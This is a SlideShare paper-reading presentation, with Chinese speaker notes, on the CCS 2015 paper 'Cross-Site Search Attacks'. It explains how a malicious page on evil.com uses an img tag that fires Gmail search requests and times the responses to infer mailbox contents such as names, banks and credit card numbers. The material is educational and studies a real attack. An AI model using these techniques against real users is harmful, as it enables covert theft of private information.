SlideShare a Scribd company logo

XSSearch

R
Ruochun Tzeng

paper reading

Data & Analytics
1 of 96
Download to read offline
Cross-Site Search Attacks CCS 2015 2 citation Nethanel Gelernter Department of Computer Science at Bar Ilan University Amir Herzberg Department of Computer Science at Bar Ilan University
Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
Motivation ● Image you're an attacker, who has a website
Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time
Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time ● What request will you send?
Motivation ● What request will you send? – request to his Gmail home page?
Motivation ● What request will you send? – request to his Gmail home page? → login or not not-logged => fast logged => slower
Motivation ● What request will you send? – request to his Gmail home page? → login or not – However, visitor's network condition varies visitorA: not-logined => faster? visitorB: logined => slower?
Motivation ● If you know whether user login or not, – there's a dummy request, – T(dummy) ~= T(not-logined) visitorA: not-logined visitorB: logined dummy dummy 253ms 246ms 100ms 15ms
Motivation ● What request will you send? – request to search on his Gmail? ● seems to be more useful dummy => always no match target
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number – many request for no-reply@xxx.com? ● no-reply@firstbank.com.tw → a client of Taiwan FirstBank ? ● no-reply@cht.tw → a mobile user of ChungHua Telecom? ● no-reply@amazon.com → like to shop at Amazon?
Motivation ● If you can make your visitor – send any requests – and measure the response time ● Targeting at search service can find more sensitive information
Motivation ● You can make your visitor – send any requests – and measure the response time XS-Timing Attack
Motivation ● You can make your visitor – send any requests – and measure the response time ● XS Search Attack = XS-Timing Attack on search service XS-Timing Attack
Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
XS-Timing Attack ● You can make your visitor – send any requests – and measure the response time ● Questions – How to make visitor send request? – Why not the response content?
XS-Timing Attack
XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain
XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain <img src=”https://mail.google.com/mail/#search/little mountain”>
XS-Timing Attack google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Same-Origin Policy
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com However, you can measure the time
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes!
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation)
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small dummy => 0 match 10 samples Avg 734ms target => 50 match 10 samples Avg 751ms
Problem dummy query: always response fast target query – fast => empty – slower => non-empty enlarge the difference ● Response time = T(communication)+T(computation)
Main Idea ● Enlarge timing difference strategy T (communication)∝contentlength – Response-Inflate T (computation) – Compute-Inflate
Response-Inflate search query is copied once for each matched entry Observation
Response-Inflate search query is copied once for each matched entry Observation => extend to max(query size) < 8KB
Compute-Inflate early abort on terms which resolves false Observation A∧B
Compute-Inflate early abort on terms which resolves false Observation Dummy Target A∧B
Compute-Inflate early abort on terms which resolves false Observation => can detect even single match on Gmail! Dummy Target A∧B
Evaluation: Compute-Inflate ● 138 active Gmail user – 90 University schoolmate – 48 Amazon M-Turk worker ● Sent a email contain single sentence – “I like [random-animal]” Dummy Target
Evaluation: Compute-Inflate
Evaluation: Compute-Inflate
Evaluation: Compute-Inflate
Evaluation: Compute-Inflate
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox?
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n)
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) – Binary search – O(log n)
Evaluation: Efficient Term Identification ● 138 active Gmail user ● Sent a email contain single sentence – “I like [random-animal]” – 32 animal options accuracy time
Claimed Experiment ● Attack on Credit number – Focus on MasterCard, Visa ● Format: 4-4-4-4 ● Attack Flow 1. Find all four 4-digit number (10,000 options) 2. Find order of the 4-digit numbers ● omit wrong combination by credit card's checksum
Conclusion ● Good discovery of how search service makes XS-Timing Attack realistic ● Typical bad paper writing style
Cross-Site Search Attacks CCS 2015 2 citation Nethanel Gelernter Department of Computer Science at Bar Ilan University Amir Herzberg Department of Computer Science at Bar Ilan University 今天要講的是 cross-site search attack 作者是以色列巴伊蘭大學
Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion 這篇是第一個發現 XS Search Attack 攻擊的 paper 一開始 motivation 講為何有人會想做這種攻擊 再來 backgroud 講 XS Search Attack 的原理 原理是 XS-Timing Attack 會介紹他是怎麼做的 然後是重點 使用 XS-Timing attack 會遇到的 challenge 是這篇要解決的問題 這篇發現利用 search service 常見的特性 剛好可以解 決 challenge 之後講 solution 看實驗 evaluation 最後結論
Motivation ● Image you're an attacker, who has a website 想像你現在是個 Attacker 你經營了一個惡意網站
Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time 而且你有能力操作來網站的 visitor 的瀏覽器 你可以讓 visitor 的瀏覽器送出任意的 request 要送什麼 request 要送到哪都可以 那送出後 你能測 request 的回傳時間
Motivation ● Image you're an attacker, who has a website ● You can make your visitor – send any requests – and measure the response time ● What request will you send? 那麼你想送什麼 request 來得到什麼資訊呢?
Motivation ● What request will you send? – request to his Gmail home page? 送個 request 給 visitor 的 Gmail 首頁好不好?
Motivation ● What request will you send? – request to his Gmail home page? → login or not not-logged => fast logged => slower 比較時間差 你頂多只能知道他有沒有登入 根據自己用 電腦經驗有登入時比較快沒登入比較慢
Motivation ● What request will you send? – request to his Gmail home page? → login or not – However, visitor's network condition varies visitorA: not-logined => faster? visitorB: logined => slower? 但仔細一想會覺得怪怪的 visitor 是不同人 假如實際情況是 visitorA 沒登入 visitorB 有登入 那 A 真的會比 B 快嗎? 不一定吧 A B 地理位置可能差很多 A 如果連到 Gmail 可能要 routing 比較久 那測到的時間反而是 A 比 B 慢 所以比較不同 visitor 的回傳時間 無法推論出 visitor 到底有沒有登入 那該怎麼辦呢?
Motivation ● If you know whether user login or not, – there's a dummy request, – T(dummy) ~= T(not-logined) visitorA: not-logined visitorB: logined dummy dummy 253ms 246ms 100ms 15ms 那就讓 visitor 自己比 怎麼比呢? 如果有個 request dummy request 不管 user 有沒有登入 dummy request 的回傳時間都 跟沒有登入的時間差不多的話 那麼想知道 visitor 有沒有登入 就讓這個 visitor 送出兩 個 request 一個給 Gmail 首頁一個給 dummy 然後 比較兩個 request 的時間 比如 A 到 Gmail 首頁是 252ms 到 dummy 是 246ms 時間差不多 可以推論 A 沒有登入 那這樣做即使 visitor 網路狀況不同 也可以知道 visitor 有沒有登入
Motivation ● What request will you send? – request to search on his Gmail? ● seems to be more useful dummy => always no match target 知道 visior 有沒有登入 Gmail 好像沒什麼用 那麼送 request 去搜尋 visitor 信箱如何?查查看 visitor 信箱裡有沒有出現過某個字? 那跟剛剛一樣 要解決 visitor 網路狀況不同的問題 可以 找個你知道一定不會有 match 的搜尋 比如搜尋一串 隨機產生的字串當作 dummy Dummy 你想搜尋的 target 只要比較慢就是有結果 那麼你要對 visitor 的信箱做什麼搜尋呢?
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name 猜他的真實姓名?用暴力法測所有可能的名字 有 match 的話就可以知道他叫什麼名字
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number 同樣暴力搜尋 可以找出 visitor 的手機號碼
Motivation ● What request will you send? – many requests for common names on his Gmail? → find out visitor's real name – many requests for xxxx-xxx-xxx on his Gmail? → find out visitor's phone number – many request for no-reply@xxx.com? ● no-reply@firstbank.com.tw → a client of Taiwan FirstBank ? ● no-reply@cht.tw → a mobile user of ChungHua Telecom? ● no-reply@amazon.com → like to shop at Amazon? 還有大家應該收過來自 no-reply@xxx 的信吧 訂閱的 blog Youtube 熱門影片 銀行定期 digest 等等 那麼能 知道 visitor 是不是台灣第一銀行的用戶阿 是不是中 華電信的用戶 是不是在 Amazon 買過東西阿 能知道這些資訊 知道愈多就能做出愈讓人相信的詐騙 訊息
Motivation ● If you can make your visitor – send any requests – and measure the response time ● Targeting at search service can find more sensitive information 所以如果你有操作 visitor 瀏覽器送 request 測時間的 能力 把目標鎖定在 search service 似乎很有機會找 到敏感的資訊
Motivation ● You can make your visitor – send any requests – and measure the response time XS-Timing Attack 一開始假設的 你可以操作 visitor 瀏覽器送 requst 且測 時間的 攻擊手法就是 XS-Timing Attack
Motivation ● You can make your visitor – send any requests – and measure the response time ● XS Search Attack = XS-Timing Attack on search service XS-Timing Attack 那鎖定在 search service 的就是 XS Search Attack 但是要使用 XS-Timing 有很大的 challenge 這篇是第 一個發現 search service 剛好可以解決 XS-Timing 的 challenge 讓這種攻擊變的有威脅力
Outline ● Motivation ● Background – XS-Timing Attack ● Challenge: XS-Timing Attack ● Problem – How to utilize characteristics of search service to overcome challenge ● Solution ● Evaluation ● Conclusion
XS-Timing Attack ● You can make your visitor – send any requests – and measure the response time ● Questions – How to make visitor send request? – Why not the response content? 第一個 要怎麼樣讓 XS-Timing Attack 可以讓 visitor 送出任何 你想要的 request? 第二個 那為什麼只能測時間呢?不能得到 response 的內容呢?
XS-Timing Attack 假設你想讓 visitor 送的 request 是去 Gmail 信箱搜尋 包含小山 little mountain 的信
XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain 那 request 網址長這樣 要怎麼讓瀏覽器自動送出 request 呢?
XS-Timing Attack URL = https://mail.google.com/mail/#search/little mountain <img src=”https://mail.google.com/mail/#search/little mountain”> 寫過網頁應該知道 瀏覽器在解析某些 tag 比如圖片 tag 會自動送出 GET 去要資源 所以你把 URL 寫在圖片來源網址裡 visitor 瀏覽器在 load 的時候 就會自動送出這個 request
XS-Timing Attack google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com 但到目前第一個問題只解了一半 因為必須登入信箱才 能在裏面做搜尋 網頁用 cookie 來辨識有沒有登入 這個 Gmail 搜尋 request 必須要附上 gmail 的 cookie 才會被 Gmail 處理 那對於 img tag 發出的 request 瀏覽器會不會附上 cookie 呢?
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com 答案是有 瀏覽器 會查看 request 送出的目的地 也就是 gmail 那瀏裡器裡跟 gmail 同個 domain 的 cookie 會自動一起送出去
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Gmail 在收到 request 後就處理 回傳搜尋結果
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com Same-Origin Policy 那瀏覽器收到後 檢查類型發現是網頁 可是明明跟說是 要去拿圖片 所以瀏覽器知道這個網站想拿網頁做壞 事 那就禁止網站讀取回傳內容 能做的壞事就被大大 限制住了 那整套規定哪些資源瀏覽器可以自動送 request 哪些 不行 如果被騙了該怎麼處理 就是 same-origin policy 規定的事
XS-Timing Attack google.com google.com <html> <img src=”mail.google.com/mail/#search/little mountain”> ... </html> evil.com google.com However, you can measure the time 但重點來了 即使看不到回傳內容 還是可以測 request 從送出到收到回應的時間阿 可以測時間 就能做 XS-Timing Attack
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! XS-Timing Attack 的 challenge 最大的困難在於 剛剛說的跟 dummy 比較時間差來推 論有沒有 match 的方法 常常判斷錯誤
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) 那原因是 首先測到的 response 回傳時間 是網路傳過 去傳回來的 communication 時間加上 server 處理 request 的 computation 時間
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small 第 1 是網路狀況太差時 即使與 dummy 有時間差 也無 法判斷是否真的有結果而不是 delay 造成的 第 2 假設網路穩定 communication 時間固定 現在 server 運算能力很強 有沒有結果可能 compute 起來 都很快 快到看不出差別
Challenge: XS-Timing Attack ● Infer by comparing timing different often make mistakes! ● Response time = T(communication)+T(computation) ● Network condition – Bad: timing difference dominated by T(communication) – Good: T(computation) difference might be too small dummy => 0 match 10 samples Avg 734ms target => 50 match 10 samples Avg 751ms 給大家一個數據 我寫了個可以做 XS-Timing 的網站 用 穩定的宿網測在我信箱兩搜尋這裡個字串的時間 一 個 dummy 搜隨機字串 沒有 match 另一個搜我的帳 號 有 50 個 match 一次送 10 組 取平均時間 結果差距只有 25 個 ms 所以直接用 XS-Timing Attack 即使網路穩定 有 50 個 match 很可能會判斷錯誤
Problem dummy query: always response fast target query – fast => empty – slower => non-empty enlarge the difference ● Response time = T(communication)+T(computation) 提升 timing attack 效率的重點在於 加大有結果時對 dummy 的時間差
Main Idea ● Enlarge timing difference strategy T (communication)∝contentlength – Response-Inflate T (computation) – Compute-Inflate 加大時間差的方法有兩個方向 1. 讓有 match 的 response 變長 增加網路傳送時間 2. 增加有 match 時的計算量
Response-Inflate search query is copied once for each matched entry Observation 增加長度的方法是根據這個觀察 下的 search query 在 match 的結果裡 每一個 match 的 entry 都會被複製 一次
Response-Inflate search query is copied once for each matched entry Observation => extend to max(query size) < 8KB 所以只要讓 query 變長 response 就會變長 那你可以用 OR 來增長 query 而不改變 search 結果
Compute-Inflate early abort on terms which resolves false Observation A∧B 用的觀察是 search service 在 evaluation query 有順 序而且為了效率通常會 early abort 比如這個 query A AND B 如果 evaluate 順序是先 A 再 B 的話 A evaluate 出 false 就會直接 abort 省去算 B 的時間 換句話說 只要能找到會讓 search service 算很久的 B 就可以大幅增加有 match 時的時間差
Compute-Inflate early abort on terms which resolves false Observation Dummy Target A∧B 在 Gmail 裡不難設計 在想搜尋的字後面做 has-not 一大堆根本不會存在的 字 如果接 100 個 Gmail 必須確認確實不包含任何個 字才能 return
Compute-Inflate early abort on terms which resolves false Observation => can detect even single match on Gmail! Dummy Target A∧B 那這樣的效果很棒 claim 在 active 的 Gmail 帳戶裡 即 使 query 只有一個 match 也能偵測出來
Evaluation: Compute-Inflate ● 138 active Gmail user – 90 University schoolmate – 48 Amazon M-Turk worker ● Sent a email contain single sentence – “I like [random-animal]” Dummy Target 來 evaluate compute inflate 的效果 這個實驗請了 138 個 active 的 Gmail 使用者 90 個系上同學 48 MTurk worker 實驗方式讓每個人寄一封確定只會出現一次的句子 I like 某個 animal
Evaluation: Compute-Inflate 這是實驗結果 n 是 sample 次數 做完會使用 statistic test 來判斷
Evaluation: Compute-Inflate 看 FN simple query 是只把 query 長度拉長而沒做 compute inflate 誤判率 >50% 比隨機亂猜還差 不知 道數據可不可信 總之他想表示只有一個 match 很容 易判斷錯誤
Evaluation: Compute-Inflate 那用了 compute inflate 後 FN 降到 10% 以內 誤判情 況大幅減少 至於 FP 都很低 沒有 match 的 query 會被誤判成有 match 的原因主要是網路 delay 所以可以表示 network delay 影響不大
Evaluation: Compute-Inflate 至於 FP 都很低 沒有 match 的 query 會被誤判成有 match 的原因主要是網路 delay 所以可以表示 network delay 影響不大
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? 接下來可以 develop 更有用的演算法 假設你有一個字的清單 T1,T2, 等等 你想知道哪些字在 信箱出現過 那要怎麼做呢?
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) Naive 想法就一個一個字做 search 嘛 看有沒有中 但學過演算法應該可以想到更好的方法
Efficient Term Identification ● Which of {T1,T2,...} appears in mailbox? ● Can you come up better solution? ● Naive – Query terms one-by-one – O(n) – Binary search – O(log n) 搭配 OR 做 divide conquer
Evaluation: Efficient Term Identification ● 138 active Gmail user ● Sent a email contain single sentence – “I like [random-animal]” – 32 animal options accuracy time 同樣 138 個使用者 每個人寄一封只會在信箱出現一次 的句子 I like 某個 animal animal 有 32 種選擇 這次實驗目標是要準確找出每個人喜歡的是哪個 animal column 是使用不同 statistic test 送 25 次準確率大概是 60% 50 次有 70%
Claimed Experiment ● Attack on Credit number – Focus on MasterCard, Visa ● Format: 4-4-4-4 ● Attack Flow 1. Find all four 4-digit number (10,000 options) 2. Find order of the 4-digit numbers ● omit wrong combination by credit card's checksum 再來是我很期待的 他們說有用自己的帳號測找信用卡 卡號的實驗 但讓我很失望 可能是因為道德因素 只在 文中講方法而沒放結果 想法是信用卡卡號有格式 4 位 4 位一組 中間用 dash 或空白隔開 那麼 divide and conquer 一次 4 位數字的 10,000 種組 合 就能找出是哪 4 個 4 位數 然後再試順序
Conclusion ● Good discovery of how search service makes XS-Timing Attack realistic ● Typical bad paper writing style 這篇發現可以利用 search service 來大幅提升 傳統認為無法達成的 XS-Timing Attack 很有趣 但缺點是 寫作風格是屬於老師一直告誡我不要挑的爛 paper main idea 演算法明明很簡單卻寫的很複雜 實驗也是 挑一組 data 當代表就好 他偏偏要做一大 堆相同的實驗把 paper 塞滿滿的 不知道在幹嘛 而大 家有興趣的卻草草帶過 很不好 我們要引以為戒

Recommended

Connascence - How to detect code smell
Connascence - How to detect code smellConnascence - How to detect code smell
Connascence - How to detect code smellThành ✐
 
Scalable gradientbasedtuningcontinuousregularizationhyperparameters ppt
Scalable gradientbasedtuningcontinuousregularizationhyperparameters pptScalable gradientbasedtuningcontinuousregularizationhyperparameters ppt
Scalable gradientbasedtuningcontinuousregularizationhyperparameters pptRuochun Tzeng
 
Cloud Database Final Project
Cloud Database Final ProjectCloud Database Final Project
Cloud Database Final ProjectRuochun Tzeng
 
On the Number of Linear Regions of DNN
On the Number of Linear Regions of DNNOn the Number of Linear Regions of DNN
On the Number of Linear Regions of DNNRuochun Tzeng
 
Tensorizing Neural Network
Tensorizing Neural NetworkTensorizing Neural Network
Tensorizing Neural NetworkRuochun Tzeng
 
Lab: Foundation of Concurrent and Distributed Systems
Lab: Foundation of Concurrent and Distributed SystemsLab: Foundation of Concurrent and Distributed Systems
Lab: Foundation of Concurrent and Distributed SystemsRuochun Tzeng
 
Tensorflow internal
Tensorflow internalTensorflow internal
Tensorflow internalHyunghun Cho
 
Neural Networks with Google TensorFlow
Neural Networks with Google TensorFlowNeural Networks with Google TensorFlow
Neural Networks with Google TensorFlowDarshan Patel
 

Recommended

Connascence - How to detect code smell
Connascence - How to detect code smellConnascence - How to detect code smell
Connascence - How to detect code smellThành ✐
 
Scalable gradientbasedtuningcontinuousregularizationhyperparameters ppt
Scalable gradientbasedtuningcontinuousregularizationhyperparameters pptScalable gradientbasedtuningcontinuousregularizationhyperparameters ppt
Scalable gradientbasedtuningcontinuousregularizationhyperparameters pptRuochun Tzeng
 
Cloud Database Final Project
Cloud Database Final ProjectCloud Database Final Project
Cloud Database Final ProjectRuochun Tzeng
 
On the Number of Linear Regions of DNN
On the Number of Linear Regions of DNNOn the Number of Linear Regions of DNN
On the Number of Linear Regions of DNNRuochun Tzeng
 
Tensorizing Neural Network
Tensorizing Neural NetworkTensorizing Neural Network
Tensorizing Neural NetworkRuochun Tzeng
 
Lab: Foundation of Concurrent and Distributed Systems
Lab: Foundation of Concurrent and Distributed SystemsLab: Foundation of Concurrent and Distributed Systems
Lab: Foundation of Concurrent and Distributed SystemsRuochun Tzeng
 
Tensorflow internal
Tensorflow internalTensorflow internal
Tensorflow internalHyunghun Cho
 
Neural Networks with Google TensorFlow
Neural Networks with Google TensorFlowNeural Networks with Google TensorFlow
Neural Networks with Google TensorFlowDarshan Patel
 
TensorFlow
TensorFlowTensorFlow
TensorFlowSang-Houn Choi
 
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & KerasGoogle Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & KerasTaegyun Jeon
 
Google TensorFlow Tutorial
Google TensorFlow TutorialGoogle TensorFlow Tutorial
Google TensorFlow Tutorial台灣資料科學年會
 
Tensorflow 2
Tensorflow 2Tensorflow 2
Tensorflow 2University of Oklahoma
 
Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2Khor SoonHin
 
Introduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlowIntroduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlowTerry Taewoong Um
 
GDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit RecapGDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit RecapJiang Jun
 
Tensorflow - Intro (2017)
Tensorflow - Intro (2017)Tensorflow - Intro (2017)
Tensorflow - Intro (2017)Alessio Tonioni
 
Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow Jen Aman
 
TENSORFLOW深度學習講座講義(很硬的課程)
TENSORFLOW深度學習講座講義(很硬的課程)TENSORFLOW深度學習講座講義(很硬的課程)
TENSORFLOW深度學習講座講義(很硬的課程)NTC.im(Notch Training Center)
 
Timing attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacksTiming attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacksPriyanka Aash
 
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...Abhimanyu Lad
 
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007Jason Hong
 
kdd2015
kdd2015kdd2015
kdd2015Deepak Agarwal
 
Atul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptxAtul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptxAtulAvhad1
 
Nondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of UsNondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of UsTomer Gabel
 
Async Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan StepanovićAsync Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan StepanovićDragan Stepanović
 
Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)ShehryarSH1
 
Instant Question Answering System
Instant Question Answering SystemInstant Question Answering System
Instant Question Answering SystemDhwaj Raj
 
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...Amazon Web Services
 
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...
Advanced timing strategies in Infusionsoft Campaign Builder by Brian Keith | ...Brian Keith
 
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)
SystemT: Declarative Information Extraction (invited talk at MIT CSAIL)Laura Chiticariu
 

More Related Content

Viewers also liked

Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & KerasGoogle Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & KerasTaegyun Jeon
 
Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2Khor SoonHin
 
Introduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlowIntroduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlowTerry Taewoong Um
 
GDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit RecapGDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit RecapJiang Jun
 
Tensorflow - Intro (2017)
Tensorflow - Intro (2017)Tensorflow - Intro (2017)
Tensorflow - Intro (2017)Alessio Tonioni
 
Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow Jen Aman
 

Viewers also liked (10)

TensorFlow
TensorFlowTensorFlow
TensorFlow
 
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & KerasGoogle Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
Google Dev Summit Extended Seoul - TensorFlow: Tensorboard & Keras
 
Google TensorFlow Tutorial
Google TensorFlow TutorialGoogle TensorFlow Tutorial
Google TensorFlow Tutorial
 
Tensorflow 2
Tensorflow 2Tensorflow 2
Tensorflow 2
 
Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2Gentlest Introduction to Tensorflow - Part 2
Gentlest Introduction to Tensorflow - Part 2
 
Introduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlowIntroduction to Deep Learning with TensorFlow
Introduction to Deep Learning with TensorFlow
 
GDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit RecapGDG-Shanghai 2017 TensorFlow Summit Recap
GDG-Shanghai 2017 TensorFlow Summit Recap
 
Tensorflow - Intro (2017)
Tensorflow - Intro (2017)Tensorflow - Intro (2017)
Tensorflow - Intro (2017)
 
Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow Large Scale Deep Learning with TensorFlow
Large Scale Deep Learning with TensorFlow
 
TENSORFLOW深度學習講座講義(很硬的課程)
TENSORFLOW深度學習講座講義(很硬的課程)TENSORFLOW深度學習講座講義(很硬的課程)
TENSORFLOW深度學習講座講義(很硬的課程)
 

Similar to XSSearch

Timing attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacksTiming attacks have never been so practical: Advance cross site search attacks
Timing attacks have never been so practical: Advance cross site search attacksPriyanka Aash
 
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...
Fast, Lenient, and Accurate – Building Personalized Instant Search Experience...Abhimanyu Lad
 
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007
CANTINA: A Content-Based Approach to Detecting Phishing Web Sites, at WWW2007Jason Hong
 
Atul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptxAtul Tulsidas Avhad - SLB.pptx
Atul Tulsidas Avhad - SLB.pptxAtulAvhad1
 
Nondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of UsNondeterministic Software for the Rest of Us
Nondeterministic Software for the Rest of UsTomer Gabel
 
Async Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan StepanovićAsync Code Reviews Are Killing Your Company’s Throughput - Dragan Stepanović
Async Code Reviews Are Killing Your Company’s Throughput - Dragan StepanovićDragan Stepanović
 
Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)Artificial Intelligence (ML - DL)
Artificial Intelligence (ML - DL)ShehryarSH1
 
Instant Question Answering System
Instant Question Answering SystemInstant Question Answering System
Instant Question Answering SystemDhwaj Raj
 
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...
AWS re:Invent 2016: Leverage the Power of the Crowd To Work with Amazon Mecha...Amazon Web Services
 
